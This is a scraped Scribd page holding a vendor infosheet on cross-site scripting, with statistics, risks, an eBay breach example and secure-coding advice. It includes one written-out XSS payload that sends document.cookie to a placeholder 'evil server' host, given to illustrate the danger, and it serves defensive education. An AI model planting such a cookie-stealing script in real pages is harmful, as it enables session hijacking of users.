0% found this document useful (0 votes)
31 views2 pages

Vulnerability Decoder Cross Site Scripting Infosheet Resource

The document discusses the vulnerability of cross-site scripting (XSS) attacks, which allow attackers to inject client-side scripts. XSS vulnerabilities are common, with 49% of applications initially vulnerable. XSS can hijack user accounts, spread malware, and access browser histories. The document provides an example of cybercriminals using XSS to phish eBay users and recommends secure coding practices like sanitizing inputs to prevent XSS.

Uploaded by

Mersal Thalaiva
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
31 views2 pages

Vulnerability Decoder Cross Site Scripting Infosheet Resource

The document discusses the vulnerability of cross-site scripting (XSS) attacks, which allow attackers to inject client-side scripts. XSS vulnerabilities are common, with 49% of applications initially vulnerable. XSS can hijack user accounts, spread malware, and access browser histories. The document provides an example of cybercriminals using XSS to phish eBay users and recommends secure coding practices like sanitizing inputs to prevent XSS.

Uploaded by

Mersal Thalaiva
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

1010101010101010101010101010101010101010101010101010110101010101010101010101010101010101

0101010101010101011010101010101010101010101010101010101010101010101010101010101010101010
10101010101010101010101010101010110101010101010101010101010101010101010101010101010101101
VU L NE R A B IL IT Y D EC ER
0101010101010101010101010101010101010101010101010110101010101010101010101010101010101010
10101010101010110101010101010101010101010101010101010101010101010101101010101010101010101
0101010101010101010101010101010110101010101010101010101010101010101010101010101010101010

CROSS-SITE SCRIPTING
1010101010101010101010101010101010101010101010110101010101010101010101010101010101010101
0101010101011010101010101010101010101010101010101010101010101010110101010101010101010101
0101010101010101010101010101011010101010101010101010101010101010101010101010101010110101
0101010101010101010101010101010101010101010101011010101010101010101010101010101010101010
1010101010101010101010101010101010101010101010101010101010101011010101010101010101010101
0101010101010101010101010101101010101010101010101010101010101010101010101010101011010101
0101010101010101010101010101010101010101010101

THE VULNERABILITY

Cross-site scripting (XSS)


49%
of applications
vulnerabilities give attackers the have a cross-
capability to inject client-side scripts site scripting
into the application, for example, to vulnerability
redirect users to malicious websites. on initial scan.

THE RISKS

Cross-site scripting can be used to hijack user


accounts, spread worms and Trojans, access
browser history and clipboard contents, control
the browser remotely, and scan and exploit
online appliances and applications.

Example Breach

Cybercriminals exploited a persistent XSS


vulnerability in the eBay website to embed
malicious JavaScript in legitimate listings,
redirecting them to spoofed eBay
login pages for phishing user credentials.
PREVENTION & REMEDIATION

Cross-site scripting vulnerabilities are preventable


with secure coding practices. For example, always
sanitize input from search fields and forms. Convert
user input to a single character encoding before
parsing. And make sure all data is validated, filtered,
or escaped before it’s sent back to the user.

Here’s an example of XSS session theft:


<script>
var img = new Image();
img.src=”http://<some evil server>.com?” + document.cookie;
</script>

RECOMMENDATIONS
Nobody writes perfect code the first
time around. You can avoid vulnerabilities
and prevent breaches when you:

 et training in secure coding best practices,


G
through on-demand eLearning courses, in-
person security consultations, and professional
development certifications and conferences.

 can early and often to detect flaws while you


S
code. Use application security tools that allow
you to scan small batches of code instantaneously,
and can provide remediation guidance within your
development workflow.

Download the Secure Coding Best Practices Handbook

Learn More in the Veracode Community


Watch a Cross-Site Scripting Tutorial Video

You might also like